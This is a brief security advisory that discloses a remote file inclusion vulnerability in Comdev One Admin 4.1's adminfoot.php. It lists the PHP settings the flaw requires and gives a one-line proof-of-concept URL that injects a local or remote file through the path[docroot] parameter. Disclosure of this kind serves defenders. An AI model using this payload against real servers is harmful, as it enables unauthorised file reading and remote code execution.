Comdev One Admin 4.1 suffers from a remote file inclusion vulnerability in adminfoot.php
a74c4799cc2bfc85910e4030a8ed33976c64655abe817b900745dd98f4458457
/****************************************/
http://www.w4cking.com
CREDIT:
w4ck1ng.com
PRODUCT:
Comdev One Admin 4.1
http://www.comdevweb.com/oneadmin.php
VULNERABILITY:
Remote File Inclusion
NOTES:
- requires register globals on
- requires magic quotes off
POC:
<host>/<path>/oneadmin/adminfoot.php?path[docroot]=<local/remote file>
ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1491
/****************************************/